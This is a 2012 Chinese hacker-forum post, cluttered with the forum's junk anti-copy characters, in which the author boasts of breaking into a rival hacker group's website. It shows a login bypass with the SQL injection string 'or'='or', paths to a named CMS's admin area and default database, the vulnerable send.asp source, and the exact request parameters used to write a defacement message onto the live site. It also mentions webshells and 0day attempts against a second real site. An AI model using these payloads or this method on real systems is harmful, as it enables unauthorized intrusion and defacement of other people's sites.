|
|
有些朋友对我和云中鹰搞华东的过程比较感兴趣,其实那个很没技术含量
4 J9 ~ W' _1 r4 @" t今天闲着无聊,把手上的项目葛一下,来论坛放松一下,顺便说说上次搞华东黑客联盟到装B的过程
! u: M/ v# c* i! g8 s5 p8 `9 C8 U这天云中鸡说华东的某人很牛X,利用JPG黑站大法把恶灵战队黑了,还发了个demo出来
: a V4 x. y) }3 t; U我去看了一下demo,感觉很黑客,于是就和云中鸡搞了一下华东
4 a7 ~ u1 h# c# J1 s, O* L首先,我记得华东只被人搞过一次(记性不好,原谅下~~),所以应该防护还是比较好的( x! X# K! O( m% t
服务器应该防ARP,不过这还只是猜测
& M* l. w7 W1 w! {& \! u. A0 D/ K云中鸡说先不搞C段,PZ一下再说
6 [5 W3 l) b1 v然后我就打开了链接标记[url=http://www.3hack.comwww.3hack.com[/url[/url]]+ K9 x5 q0 Y% w
一看,我晕,怎么网站变了................以前我比较喜欢到华东去看动画,现在怎么变成这鸟样了,晕............../ A$ |% S; d$ j3 F
这时候云中鸡丢了一个同F的站过来,说进了后台搞不了shell
% i8 h- w+ ]( f/ X3 g2 C我看了下搞到了一个webshell出来(这里涉及点技巧,不过不是重点,故省略....),登上webshell后发现服务器的权限很BT
5 r* b/ @% x: l) n然后我就把shell丢给云中鸡去提权,过了一会儿找到了一个二级玉米的站shop.xiahack.cn: I1 E, d( {3 B. t V2 I0 h5 i5 F
看着是用eshop来架设的网店,虽然不是同F,但还是想搞下他看有什么可利用的地方,用了几个0day去搞发现不是最新版,0day用不鸟
& r; Y8 M4 ?7 N& C0 c; v( l2 c) h问了下云中鸡提权怎样了,他说还在努力,装不鸟B就不睡觉,晕了,这下入侵陷入了僵局...............- r" }; _2 @& g, a3 a" b
无聊到网上乱逛,这时无意中发现一个阿拉伯XXXXXX,具体就不说啥鸟,呵呵~~! p$ |9 E& d. _6 M+ `& \. j
然后阿拉伯黑客发现了链接标记[url=http://www.3hack.comwww.3hack.com[/url[/url]]上有个xia的目录很可疑,于是我就去看看是什么
! }- p6 Z: j- w& E7 m打开一看,如图1所示。6 z% l6 X- o" w1 t
) Q0 p" D* b% u; b' f+ D http://00day.cn/forum/attachment/thumb/6_1_a8d665f343765b2.jpg
/ ?2 I6 k. P5 K; N* J我靠~~这啥东西?这么帅?点进去一看,如图2所示。, j$ O: N9 T# H; U9 s
8 Y0 d( c' l8 v9 n" v# U
http://00day.cn/forum/attachment/thumb/6_1_d741c5c7b6b8a48.jpg
: x. f: G' { E7 n- G3 a太帅了,真YD!!
" F( E7 e4 M! Y7 Y这个页面应该是一套个人主页程序,而且还挺炫的!( d. g5 t2 L" o; `/ d
这个页面有发表日志的地方,应该可能存在登陆页面,找了一轮后发现当鼠标放到网页顶端的时候就会弹出登陆页面,如图3所示。
* H# Z6 j5 w$ u1 |! z
3 P, d. i) }$ g" ^( ? http://00day.cn/forum/attachment/6_1_b03700cb2fe5d52.jpg
# t* X- L" J9 U; Z嘿嘿,试着'or'='or'居然进去了!!如图4所示。
; b4 J, F- _ ^; P" j" p
' O) S' c- V/ O8 j/ q http://00day.cn/forum/attachment/6_1_7107004af344a3c.jpg( `# j( P* m" P) q4 p) U, i
经过半个多小时的摸索,还是没有发现可利用的地方。$ _5 m8 a* E p. u. o O2 j
这下郁闷了,不管了,把这套程序下载下来看看吧( X( O. ~/ w5 E% F8 o
找了一会才知道这套程序叫做“V时代个人flash主页”8 Y7 O: S& e' p" r2 q. E* `
到官方下了套最新版,然后找了一下可利用的地方,不一会,我发现“/html/admin”这个目录很可能可以利用* l; \6 I2 t1 l/ I' A4 J
于是马上打开链接标记[url=http://www.3hack.com/xia/html/adminhttp://www.3hack.com/xia/html/admin[/url[/url]]- x8 n+ n% J/ e, [4 O6 ]$ d0 \
返回的确实找不到页面,郁闷了,输入链接标记[url=http://www.3hack.com/xia/html/http://www.3hack.com/xia/html/[/url[/url]]2 T; ^6 u" d8 L
同样是找不到页面,真晕!再看看!5 h) @- G9 d3 G! R- a( S* O
5分钟过后,我发现后台地址是“/asp”,默认数据库是“/asp/vshidai.mdb”,嘿嘿!这下你不死定了!4 J4 [- n. @/ G& |, Y# E
马上打开链接标记[url=http://www.3hack.com/xia/asp/vshidai.mdbhttp://www.3hack.com/xia/asp/vshidai.mdb[/url[/url]],我晕!服务器居然设置了mdb后缀映射,下载不了!
, v6 e9 ]+ r4 Z. @打开链接标记[url=http://www.3hack.com/xia/asp/http://www.3hack.com/xia/asp/[/url[/url]],发现返回空白,这下我真是服了!
( k8 N" C9 y4 u% F& ]希望快覆灭了,这时我点到了根目录下的send.asp文件,看到里面存在着一个有意思的东西,代码如下:! z# X7 x* \' _/ Z S
9 |: x# f- B; ~: z7 d) z3 U
var a
1 j0 ~6 Q2 C+ Wvar b) |/ c# k# k% b" u& L! b7 M
var tx
8 r& c5 i# @4 B" b# dvar clean) m& D+ d J' U
a=Request("re")
+ v8 ]3 v1 j, kclean=Request("clean")$ H+ N/ [0 j% m) U
var jian="test.txt"
; n/ l' x8 K% O
) ^* m8 [& ^& ^- P; e9 q0 ~if(clean==1){* P1 a9 W; J# [+ I( G4 ]2 e1 F
tx="&a="% @; r3 X8 @" q8 j
var fs2
: g8 m J, v3 W# |6 D1 e& n% vvar fs2=Server.CreateObject("Scripting.FileSystemObject")1 X6 b! e, v' {
var newdt=fs2.OpenTextFile(Server.MapPath(jian),2,true): M, l K; \( ^/ K5 m6 _
newdt.WriteLine("&a=")
; k- B- B) ~8 H' i. Wnewdt.close()# j5 k+ M! V# l' x1 [
}. J! f# c' t- y1 v' n3 t3 X
. c( i' C; |, x% p8 _
if(clean==0|clean==1){
3 W: a0 g c/ m% O1 htx=""% F7 n/ Y! z4 p) w( |8 h% S5 o
var fso = Server.Createobject("Scripting.FileSystemObject")) `" l l2 c7 e$ q1 h/ E+ W
var file = fso.OpenTextFile(Server.Mappath(jian))
# j8 q% Q% g4 f( }8 ?. Vwhile (!file.AtEndOfStream){
1 z% f" M4 R. m8 qtx=file.ReadLine()
- b. p1 o$ e7 P+ E% f9 KResponse.write (tx)
+ ~& W, G9 V* D B8 \0 B* v}
. }- m0 m3 A, P* O5 Y" gResponse.write ("&")
9 r6 I6 U& U2 P( [$ t: x7 F& Ifile.close()1 y# O4 z2 ?- t3 m# v2 \0 \, e( Q
}. \% ]8 ~. b7 J5 U$ b
; z ]9 [. \0 U; g' ~4 q) U1 A2 I. ?if(clean==2){' ~0 Q9 `! r: T$ ~
tx=""
7 P! E8 B7 X6 t1 C$ n/ {var fso = Server.Createobject("Scripting.FileSystemObject")
* y3 E6 M; Y+ nvar file = fso.OpenTextFile(Server.Mappath(jian))
, B9 _( E$ e- K8 I% Z% N# w
' F" s9 r2 X b* R4 e) v4 Q$ Dvar fs2
5 ^0 f3 C7 a2 c2 K# avar fs2=Server.CreateObject("Scripting.FileSystemObject")
. } `: G; x1 W/ Bvar newdt=fs2.OpenTextFile(Server.MapPath(jian),8,true)/ D7 j" b8 N" i: i6 s
% |! \1 {) o3 j2 a
- x7 E Y8 a3 U2 dwhile (!file.AtEndOfStream){
3 t- O2 A4 m A1 S u* e# Utx=file.ReadLine()
7 f1 p+ R0 w& F2 ZResponse.write (tx)}/ z/ {9 O; U) K0 _' D( G/ H! C
8 m" G8 a$ k7 r; S+ h/ i
Response.write (a+"&")
$ L5 S2 u8 |0 n& e8 hnewdt.WriteLine(a)1 i9 n; h7 |$ H. c s8 J! s
* w @$ g5 ?1 _9 Cfile.close(). s" ]0 B0 s. A; P: Q
newdt.close()
+ O" f$ T" f% U$ F7 g4 o7 r}
/ {' m% q! E0 s/ z# n* v
$ `2 M& U4 Z5 A- g+ Q: H4 J# I9 S h; _; X h: o" }% W7 q! V
复制代码8 }8 r' _* P3 K2 P
这下应该可以装B了!从代码看出,我们首先要提交“send.asp?clean=1”来创建一个名为test.txt的文件,文件里面写着“&a=&”
6 V' _7 y# Q# m, e/ G( e/ B6 ~接下来我们提交“send.asp?clean=2&re=H4cked by 落叶纷飞 and 云中鹰....00day.cn全体飘过”
" f1 D# w; Y/ I" \5 }9 ?这样就能在test.txt文件里新建一行并写入“H4cked by 落叶纷飞 and 云中鹰....00day.cn全体飘过”这句话
* z& ]+ {& T0 u" m* `过程如图5、6所示。
- ]% b' d6 S. f, Z% A/ ~0 e
6 M( i& }9 B* H5 c+ ihttp://00day.cn/forum/attachment/thumb/6_1_cd66a1c03f6682b.jpg) R9 g/ Y# y M- s. J! s* T, R
* I" [0 r- |8 B" `- P http://00day.cn/forum/attachment/thumb/6_1_942adfb1ce45224.jpg
9 q+ H1 U1 J; y' T提交后我们打开链接标记[url=http://www.3hack.com/xia/test.txtwww.3hack.com/xia/test.txt[/url[/url]]看看,如图7所示。
) ?. t3 ]# s" H8 M9 i; N1 n0 Q- T$ S1 s3 _: D) f' I
http://00day.cn/forum/attachment/thumb/6_1_10f60a12650b618.jpg
V% s) q. m8 S5 `这下终于可以装到X了,如果不是V时代的作者写的send.asp代码存在问题,拿到shell是不难的# ?* ~; |" x6 |0 W& u; }' y6 z
如果jian是经过request取值的话,同样也能搞到shell。+ J4 k+ {( D. G) f1 H3 ?; R# E
这次只是装到了X,并没有拿到shell+ I1 s! S! X. _% m1 m; W
已经是凌晨了,跟云中J说了声就睡觉去鸟# E$ b5 m$ Y/ _; ^" R; D6 U6 B
估计那B可能搞到了权限,不过我没问他,最近事情比较多,也比较忙
' z( J0 u+ }' h- n& l8 `6 B就到这里吧,没技术含量,纯粹装X,高手们见笑了. f$ |0 v }7 ] x/ z
另外劝告某些认为上传个JPG就能黑到站的大黑客,你这样自欺欺人吃亏的是你自己
# V' T! o% F: W: A0 F0 z4 C自己学不到技术,却还在自欺欺人) X# n* H9 U$ K1 [
不说了,本文到这里,最后感谢一下阿拉伯黑客,原来阿拉伯黑客也是很强大的,好了,猪大家愉快~~
- \8 s( z( d! u. A
; s2 o3 Y* [; E8 C' r3 ~1 l- m |
|
发表于 2012-11-6 21:06:10
收藏
支持
反对